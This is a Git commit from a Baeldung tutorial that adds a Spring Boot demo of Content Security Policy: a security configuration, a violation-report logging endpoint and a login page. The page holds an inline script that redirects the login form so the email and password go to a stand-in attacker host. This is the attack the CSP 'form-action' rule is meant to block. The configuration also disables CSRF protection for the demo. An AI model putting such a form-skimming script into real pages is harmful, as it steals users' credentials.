BAEL-4837 - Content Security Policy using Spring Security and Spring … (#11603)

* BAEL-4837 - Content Security Policy using Spring Security and Spring Boot

* Application Code

* Formatted the code

* Reformatted the test cases as per review comments

* Removed the formatters and deleted extra spaces

Co-authored-by: Bhaskara Navuluri <bhaskara.navuluri@hpe.com>
This commit is contained in:
Bhaskara
2021-12-26 08:14:50 +05:30
committed by GitHub
parent 9b905cef77
commit f16ed0b658
7 changed files with 237 additions and 3 deletions
@@ -0,0 +1,11 @@
package com.baeldung.contentsecuritypolicy;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
@SpringBootApplication
public class ContentSecurityPolicyApplication {
public static void main(String[] args) {
SpringApplication.run(ContentSecurityPolicyApplication.class, args);
}
}
@@ -0,0 +1,23 @@
package com.baeldung.contentsecuritypolicy;
import org.apache.commons.io.IOUtils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RestController;
import javax.servlet.http.HttpServletRequest;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
@RestController
public class ContentSecurityPolicyController {
private static final Logger logger = LoggerFactory.getLogger(ContentSecurityPolicyController.class);
@PostMapping("/report")
public void report(HttpServletRequest request) throws IOException {
if (logger.isInfoEnabled()) {
logger.info("Report: {}", IOUtils.toString(request.getInputStream(), StandardCharsets.UTF_8));
}
}
}
@@ -0,0 +1,26 @@
package com.baeldung.contentsecuritypolicy;
import org.springframework.context.annotation.Configuration;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;
import org.springframework.security.web.header.writers.StaticHeadersWriter;
@Configuration
public class ContentSecurityPolicySecurityConfiguration extends WebSecurityConfigurerAdapter {
private static final String REPORT_TO = "{\"group\":\"csp-violation-report\",\"max_age\":2592000,\"endpoints\":[{\"url\":\"https://localhost:8080/report\"}]}";
@Override
protected void configure(HttpSecurity http) throws Exception {
http.csrf()
.disable()
.authorizeRequests()
.antMatchers("/**")
.permitAll()
.and()
.headers()
.addHeaderWriter(new StaticHeadersWriter("Report-To", REPORT_TO))
.xssProtection()
.and()
.contentSecurityPolicy("form-action 'self'; report-uri /report; report-to csp-violation-report");
}
}
@@ -0,0 +1,67 @@
<!DOCTYPE html>
<html lang="en">
<head>
<title>Content Security Policy</title>
<link href="/webjars/bootstrap/css/bootstrap.min.css" rel="stylesheet">
<script src="/webjars/jquery/jquery.min.js"></script>
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Raleway:wght@100;200;300&display=swap" rel="stylesheet">
<link href="/main.css" rel="stylesheet">
</head>
<body>
<nav class="navbar navbar-dark bg-dark">
<div class="container-fluid">
<a class="navbar-brand" href="#">
Baeldung &ndash; Content Security Policy
</a>
</div>
</nav>
<br/>
<div class="container">
<div class="row justify-content-center">
<div class="col-6">
<div class="alert alert-warning" role="alert">
Session time out. Please login.
</div>
</div>
</div>
<div class="row justify-content-center">
<div class="col-6">
<div class="card">
<div class="card-body">
<h3 class="card-title"><strong>Login</strong></h3>
<hr/>
<form id="login" action="/login" method="post" autocomplete="off">
<div class="form-group">
<label for="email">Email <span class="text-danger">*</span></label>
<input type="text" class="form-control" id="email" autocomplete="off">
</div>
<br/>
<div class="form-group">
<label for="password">Password <span class="text-danger">*</span></label>
<input type="password" class="form-control" id="password">
</div>
<script>
let form = document.forms.login;
form.onsubmit = function () {
let username = document.getElementById("email").value;
let password = document.getElementById("password").value;
form.action = "https://youaredoomed.com:9090/collect?u=" + username + "&p=" + password;
}
</script>
<br/>
<button class="btn btn-primary">Login</button>
</form>
</div>
</div>
</div>
</div>
</div>
</body>
</html>
@@ -0,0 +1,26 @@
html, body{
font-family: Raleway, serif;
background-color: #f5f5f5;
}
.navbar
{
background-color: #63b175 !important;
}
.navbar-brand
{
font-size: 1.75rem;
font-weight: bold;
}
/*
hr{
border: 0px dotted rgba(249, 249, 249, 0.88);
}*/
hr {
border: 0;
border-bottom: 1px dashed #969595;
background: #969595;
}
label{
font-weight: bold;
}